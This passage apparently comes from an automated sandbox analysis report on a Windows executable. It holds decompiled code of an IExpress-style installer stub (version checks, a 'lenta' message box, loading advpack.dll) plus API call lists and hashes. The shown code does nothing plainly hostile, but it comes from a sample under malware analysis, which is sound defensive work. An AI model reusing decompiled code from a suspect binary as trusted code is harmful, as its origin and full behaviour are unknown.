                                                                                                                                                                                                                                              							_t133 = 0x54d;
                                                                                                                                                                                                                                              							__eflags = _t123;
                                                                                                                                                                                                                                              							if(_t123 < 0) {
                                                                                                                                                                                                                                              								L32:
                                                                                                                                                                                                                                              								__eflags = _v420 - 1;
                                                                                                                                                                                                                                              								if(_v420 == 1) {
                                                                                                                                                                                                                                              									_t138 = 0x54c;
                                                                                                                                                                                                                                              									L36:
                                                                                                                                                                                                                                              									__eflags = _t138;
                                                                                                                                                                                                                                              									if(_t138 != 0) {
                                                                                                                                                                                                                                              										L40:
                                                                                                                                                                                                                                              										__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              										if(_t138 == _t133) {
                                                                                                                                                                                                                                              											L30:
                                                                                                                                                                                                                                              											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                                                              											_t115 = 0;
                                                                                                                                                                                                                                              											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                                                              											__eflags = _t138 - _t133;
                                                                                                                                                                                                                                              											_t133 = _v432;
                                                                                                                                                                                                                                              											if(__eflags != 0) {
                                                                                                                                                                                                                                              												_t124 = _v440;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                                                              												_v420 =  &_v268;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              											__eflags = _t124;
                                                                                                                                                                                                                                              											if(_t124 == 0) {
                                                                                                                                                                                                                                              												_t135 = _v436;
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												_t99 = _t124[0x30];
                                                                                                                                                                                                                                              												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                                                              												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                                                              												if((_t99 & 0x00000001) == 0) {
													asm("sbb ebx, ebx");
													_t115 =  ~(_t99 & 2) & 0x00000101;
												} else {
													_t115 = 0x104;
												}
											}
											__eflags =  *0x1a8a38 & 0x00000001;
											if(( *0x1a8a38 & 0x00000001) != 0) {
												L64:
												_push(0);
												_push(0x30);
												_push(_v420);
												_push("lenta");
												goto L65;
											} else {
												__eflags = _t135;
												if(_t135 == 0) {
													goto L64;
												}
												__eflags =  *_t135;
												if( *_t135 == 0) {
													goto L64;
												}
												MessageBeep(0);
												_t94 = E001A681F(_t115);
												__eflags = _t94;
												if(_t94 == 0) {
													L57:
													0x180030 = 0x30;
													L58:
													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
													__eflags = _t115 & 0x00000004;
													if((_t115 & 0x00000004) == 0) {
														__eflags = _t115 & 0x00000001;
														if((_t115 & 0x00000001) == 0) {
															goto L66;
														}
														__eflags = _t97 - 1;
														L62:
														if(__eflags == 0) {
															_t138 = 0;
														}
														goto L66;
													}
													__eflags = _t97 - 6;
													goto L62;
												}
												_t98 = E001A67C9(_t124, _t124);
												__eflags = _t98;
												if(_t98 == 0) {
													goto L57;
												}
												goto L58;
											}
										}
										__eflags = _t138 - 0x54c;
										if(_t138 == 0x54c) {
											goto L30;
										}
										__eflags = _t138;
										if(_t138 == 0) {
											goto L66;
										}
										_t135 = 0;
										__eflags = 0;
										goto L44;
									}
									L37:
									_t129 = _v432;
									__eflags = _t129[0x7c];
									if(_t129[0x7c] == 0) {
										goto L66;
									}
									_t133 =  &_v268;
									_t104 = E001A28E8(_t129,  &_v268, _t129,  &_v428);
									__eflags = _t104;
									if(_t104 != 0) {
										goto L66;
									}
									_t135 = _v428;
									_t133 = 0x54d;
									_t138 = 0x54d;
									goto L40;
								}
								goto L33;
							}
							__eflags = _t91;
							if(_t91 > 0) {
								goto L32;
							}
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t91;
								if(_t91 != 0) {
									goto L37;
								}
								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
								L27:
								if(__eflags <= 0) {
									goto L37;
								}
								L28:
								__eflags = _t135;
								if(_t135 == 0) {
									goto L33;
								}
								_t138 = 0x54c;
								goto L30;
							}
							__eflags = _t91;
							_t107 = _v416.dwBuildNumber;
							if(_t91 != 0) {
								_t131 = _v424;
								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
									goto L37;
								}
								goto L28;
							}
							_t132 = _t107 & 0x0000ffff;
							_t109 = _v424;
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
								goto L28;
							}
							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
							goto L27;
							L33:
							_t135 =  &(_t135[1]);
							_v428 = _t135;
							_v420 = _t135;
							__eflags = _t135 - 2;
						} while (_t135 < 2);
						goto L36;
					}
					__eflags = _t77 == 1;
					if(_t77 == 1) {
						 *0x1a9a40 = _t119;
                                                                                                                                                                                                                                              						 *0x1a8184 = 1;
                                                                                                                                                                                                                                              						 *0x1a8180 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - 3;
                                                                                                                                                                                                                                              						if(_t133 > 3) {
                                                                                                                                                                                                                                              							__eflags = _t133 - 5;
                                                                                                                                                                                                                                              							if(_t133 < 5) {
                                                                                                                                                                                                                                              								goto L14;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              							_t113 = 3;
                                                                                                                                                                                                                                              							_t119 = _t113;
                                                                                                                                                                                                                                              							goto L13;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t119 = 1;
                                                                                                                                                                                                                                              						_t114 = 3;
                                                                                                                                                                                                                                              						 *0x1a9a40 = 1;
                                                                                                                                                                                                                                              						__eflags = _t133 - _t114;
                                                                                                                                                                                                                                              						if(__eflags < 0) {
                                                                                                                                                                                                                                              							L9:
                                                                                                                                                                                                                                              							 *0x1a8184 = _t135;
                                                                                                                                                                                                                                              							 *0x1a8180 = _t135;
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						if(__eflags != 0) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                                                              						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                                                              							goto L14;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              					_t138 = 0x4ca;
                                                                                                                                                                                                                                              					goto L44;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t138 = 0x4b4;
                                                                                                                                                                                                                                              					L44:
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(0x10);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					_push(_t135);
                                                                                                                                                                                                                                              					L65:
                                                                                                                                                                                                                                              					_t133 = _t138;
                                                                                                                                                                                                                                              					E001A44B9(0, _t138);
                                                                                                                                                                                                                                              					L66:
                                                                                                                                                                                                                                              					return E001A6CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              			}





































                                                                                                                                                                                                                                              0x001a3a0f
                                                                                                                                                                                                                                              0x001a3a0f
                                                                                                                                                                                                                                              0x001a3a11
                                                                                                                                                                                                                                              0x001a3a13
                                                                                                                                                                                                                                              0x001a3a19
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39b8
                                                                                                                                                                                                                                              0x001a39b8
                                                                                                                                                                                                                                              0x001a39ba
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39bc
                                                                                                                                                                                                                                              0x001a39bf
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39c3
                                                                                                                                                                                                                                              0x001a39c9
                                                                                                                                                                                                                                              0x001a39ce
                                                                                                                                                                                                                                              0x001a39d0
                                                                                                                                                                                                                                              0x001a39e3
                                                                                                                                                                                                                                              0x001a39e5
                                                                                                                                                                                                                                              0x001a39e6
                                                                                                                                                                                                                                              0x001a39f1
                                                                                                                                                                                                                                              0x001a39f7
                                                                                                                                                                                                                                              0x001a39fa
                                                                                                                                                                                                                                              0x001a3a01
                                                                                                                                                                                                                                              0x001a3a04
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3a06
                                                                                                                                                                                                                                              0x001a3a09
                                                                                                                                                                                                                                              0x001a3a09
                                                                                                                                                                                                                                              0x001a3a0b
                                                                                                                                                                                                                                              0x001a3a0b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3a09
                                                                                                                                                                                                                                              0x001a39fc
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39fc
                                                                                                                                                                                                                                              0x001a39d3
                                                                                                                                                                                                                                              0x001a39d8
                                                                                                                                                                                                                                              0x001a39da
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a39dc
                                                                                                                                                                                                                                              0x001a39b6
                                                                                                                                                                                                                                              0x001a3955
                                                                                                                                                                                                                                              0x001a395b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3961
                                                                                                                                                                                                                                              0x001a3963
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3969
                                                                                                                                                                                                                                              0x001a3969
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3969
                                                                                                                                                                                                                                              0x001a3915
                                                                                                                                                                                                                                              0x001a3915
                                                                                                                                                                                                                                              0x001a391b
                                                                                                                                                                                                                                              0x001a391f
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a392d
                                                                                                                                                                                                                                              0x001a3933
                                                                                                                                                                                                                                              0x001a3938
                                                                                                                                                                                                                                              0x001a393a
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3940
                                                                                                                                                                                                                                              0x001a3946
                                                                                                                                                                                                                                              0x001a394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a394b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38f2
                                                                                                                                                                                                                                              0x001a3843
                                                                                                                                                                                                                                              0x001a3845
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a384b
                                                                                                                                                                                                                                              0x001a384d
                                                                                                                                                                                                                                              0x001a3883
                                                                                                                                                                                                                                              0x001a3885
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a389a
                                                                                                                                                                                                                                              0x001a389e
                                                                                                                                                                                                                                              0x001a389e
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38a0
                                                                                                                                                                                                                                              0x001a38a0
                                                                                                                                                                                                                                              0x001a38a2
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38a4
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a38a4
                                                                                                                                                                                                                                              0x001a384f
                                                                                                                                                                                                                                              0x001a3851
                                                                                                                                                                                                                                              0x001a3857
                                                                                                                                                                                                                                              0x001a386e
                                                                                                                                                                                                                                              0x001a3877
                                                                                                                                                                                                                                              0x001a387b
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x00000000
                                                                                                                                                                                                                                              0x001a3881

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,00000000,?,?), ref: 001A3723
                                                                                                                                                                                                                                              • MessageBeep.USER32(00000000), ref: 001A39C3
                                                                                                                                                                                                                                              • MessageBoxA.USER32(00000000,00000000,lenta,00000030), ref: 001A39F1
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Message$BeepVersion
                                                                                                                                                                                                                                              • String ID: 3$lenta
                                                                                                                                                                                                                                              • API String ID: 2519184315-4216304122
                                                                                                                                                                                                                                              • Opcode ID: 4d81d7a88b7c87c9ff4f8701349701c1ef15d898bdcbbabb39400ff6865233b5
                                                                                                                                                                                                                                              • Instruction ID: f7f2127d0e27c56b103caa78863d2a25e370559673d4bf7060ac4ab6714d9488
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d81d7a88b7c87c9ff4f8701349701c1ef15d898bdcbbabb39400ff6865233b5
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8C91E4B9F012249FEB798F64CC817AAB7A0AB47304F1541AAF869D7251D7748F81CB41
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                                                                              			E001A6495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                                                                              				char _v268;
                                                                                                                                                                                                                                              				void* __edi;
                                                                                                                                                                                                                                              				signed int _t9;
                                                                                                                                                                                                                                              				signed char _t14;
                                                                                                                                                                                                                                              				struct HINSTANCE__* _t15;
                                                                                                                                                                                                                                              				void* _t18;
                                                                                                                                                                                                                                              				CHAR* _t26;
                                                                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t27 = __esi;
                                                                                                                                                                                                                                              				_t18 = __ebx;
                                                                                                                                                                                                                                              				_t9 =  *0x1a8004; // 0x56898003
                                                                                                                                                                                                                                              				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                                                                              				E001A1781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                                                                                                                                                                                                                                              				_t26 = "advpack.dll";
                                                                                                                                                                                                                                              				E001A658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                                                              				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                              				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return E001A6CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                                                              			}














                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 001A64DF
                                                                                                                                                                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 001A64F9
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00000000), ref: 001A6502
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$advpack.dll
                                                                                                                                                                                                                                              • API String ID: 438848745-875882553
                                                                                                                                                                                                                                              • Opcode ID: c796f7f317f66af7f5776a90995021312bee837fb20cb7c29d7db6a24c43d23b
                                                                                                                                                                                                                                              • Instruction ID: d3f6359d624f71f4f1c8b41c544a67e16489ef3f47365b604a6500763d89242b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c796f7f317f66af7f5776a90995021312bee837fb20cb7c29d7db6a24c43d23b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7401D178A00108AFDB54EB64DC49AEA7778EB62320F900195F585921C0DF709ECACA51
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                                              			E001A28E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                              				void* _v8;
                                                                                                                                                                                                                                              				char* _v12;
                                                                                                                                                                                                                                              				intOrPtr _v16;
                                                                                                                                                                                                                                              				void* _v20;
                                                                                                                                                                                                                                              				intOrPtr _v24;
                                                                                                                                                                                                                                              				int _v28;
                                                                                                                                                                                                                                              				int _v32;
                                                                                                                                                                                                                                              				void* _v36;
                                                                                                                                                                                                                                              				int _v40;
                                                                                                                                                                                                                                              				void* _v44;
                                                                                                                                                                                                                                              				intOrPtr _v48;
                                                                                                                                                                                                                                              				intOrPtr _v52;
                                                                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                                                                              				long _t68;
                                                                                                                                                                                                                                              				void* _t70;
                                                                                                                                                                                                                                              				void* _t73;
                                                                                                                                                                                                                                              				void* _t79;
                                                                                                                                                                                                                                              				void* _t83;
                                                                                                                                                                                                                                              				void* _t87;
                                                                                                                                                                                                                                              				void* _t88;
                                                                                                                                                                                                                                              				intOrPtr _t93;
                                                                                                                                                                                                                                              				intOrPtr _t97;
                                                                                                                                                                                                                                              				intOrPtr _t99;
                                                                                                                                                                                                                                              				int _t101;
                                                                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                                                                              				void* _t106;
                                                                                                                                                                                                                                              				void* _t109;
                                                                                                                                                                                                                                              				void* _t110;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_v12 = __edx;
                                                                                                                                                                                                                                              				_t99 = __ecx;
                                                                                                                                                                                                                                              				_t106 = 0;
                                                                                                                                                                                                                                              				_v16 = __ecx;
                                                                                                                                                                                                                                              				_t87 = 0;
                                                                                                                                                                                                                                              				_t103 = 0;
                                                                                                                                                                                                                                              				_v20 = 0;
                                                                                                                                                                                                                                              				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                              					L19:
                                                                                                                                                                                                                                              					_t106 = 1;
                                                                                                                                                                                                                                              				} else {
                                                                                                                                                                                                                                              					_t62 = 0;
                                                                                                                                                                                                                                              					_v8 = 0;
                                                                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                                                                              						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                              						if(E001A2773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                              							goto L20;
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                                                              						_v28 = _t68;
                                                                                                                                                                                                                                              						if(_t68 == 0) {
                                                                                                                                                                                                                                              							_t99 = _v16;
                                                                                                                                                                                                                                              							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                              							_t93 = _v24;
                                                                                                                                                                                                                                              							_t87 = _v20;
                                                                                                                                                                                                                                              							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                              								goto L18;
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						} else {
                                                                                                                                                                                                                                              							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                              							if(_t103 != 0) {
                                                                                                                                                                                                                                              								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                              								_v36 = _t73;
                                                                                                                                                                                                                                              								if(_t73 != 0) {
                                                                                                                                                                                                                                              									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                              										L15:
                                                                                                                                                                                                                                              										GlobalUnlock(_t103);
                                                                                                                                                                                                                                              										_t99 = _v16;
                                                                                                                                                                                                                                              										L18:
                                                                                                                                                                                                                                              										_t87 = _t87 + 1;
                                                                                                                                                                                                                                              										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										_v20 = _t87;
                                                                                                                                                                                                                                              										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                              										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                              											continue;
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L19;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									} else {
                                                                                                                                                                                                                                              										_t79 = _v44;
                                                                                                                                                                                                                                              										_t88 = _t106;
                                                                                                                                                                                                                                              										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                              										_t101 = _v28;
                                                                                                                                                                                                                                              										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                              										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                              										_t97 = _v48;
                                                                                                                                                                                                                                              										_v36 = _t83;
                                                                                                                                                                                                                                              										_t109 = _t83;
                                                                                                                                                                                                                                              										do {
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E001A2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                              											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E001A2A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                              											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                              											_t88 = _t88 + 4;
                                                                                                                                                                                                                                              										} while (_t88 < 8);
                                                                                                                                                                                                                                              										_t87 = _v20;
                                                                                                                                                                                                                                              										_t106 = 0;
                                                                                                                                                                                                                                              										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                              											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                              												GlobalUnlock(_t103);
                                                                                                                                                                                                                                              											} else {
                                                                                                                                                                                                                                              												goto L15;
                                                                                                                                                                                                                                              											}
                                                                                                                                                                                                                                              										} else {
                                                                                                                                                                                                                                              											goto L15;
                                                                                                                                                                                                                                              										}
                                                                                                                                                                                                                                              									}
                                                                                                                                                                                                                                              								}
                                                                                                                                                                                                                                              							}
                                                                                                                                                                                                                                              						}
                                                                                                                                                                                                                                              						goto L20;
                                                                                                                                                                                                                                              					}
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				L20:
                                                                                                                                                                                                                                              				 *_a8 = _t87;
                                                                                                                                                                                                                                              				if(_t103 != 0) {
                                                                                                                                                                                                                                              					GlobalFree(_t103);
                                                                                                                                                                                                                                              				}
                                                                                                                                                                                                                                              				return _t106;
                                                                                                                                                                                                                                              			}


































                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GlobalFree.KERNEL32 ref: 001A2A6F
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: CharUpperA.USER32(56898003,00000000,00000000,00000000), ref: 001A27A8
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: CharNextA.USER32(0000054D), ref: 001A27B5
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: CharNextA.USER32(00000000), ref: 001A27BC
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2829
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: RegQueryValueExA.ADVAPI32(?,001A1140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2852
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A2870
                                                                                                                                                                                                                                                • Part of subcall function 001A2773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 001A28A0
                                                                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,001A3938,?,?,?,?,-00000005), ref: 001A2958
                                                                                                                                                                                                                                              • GlobalLock.KERNEL32 ref: 001A2969
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,001A3938,?,?,?,?,-00000005,?), ref: 001A2A21
                                                                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 001A2A81
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000001.00000002.411425233.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411409282.00000000001A0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411438065.00000000001A8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              • Associated: 00000001.00000002.411446863.00000000001AC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_1a0000_fuN31PL.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3949799724-0
                                                                                                                                                                                                                                              • Opcode ID: 4c86b7db0c3ad12564e9801666ea76271fa143f8114571f0d3ab0d2c1ae7aee1
                                                                                                                                                                                                                                              • Instruction ID: bbb206410670899f9cbbb7aa8c7a8692cade60ce615b0b08b67e3ef0ab343824
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4c86b7db0c3ad12564e9801666ea76271fa143f8114571f0d3ab0d2c1ae7aee1
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9B512A35E00219EFCB25DF98D884AAEFBB5FF49700F14416AE915E3621DB319E41DB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              C-Code - Quality: 32%
                                                                                                                                                                                                                                              			E001A4169(void* __eflags) {
                                                                                                                                                                                                                                              				int _t18;
                                                                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                                                                              
                                                                                                                                                                                                                                              				_t20 = E001A468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                                                              				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                                                              				if(_t21 != 0) {
                                                                                                                                                                                                                                              					if(E001A468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                                                              						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                                                              							L7:
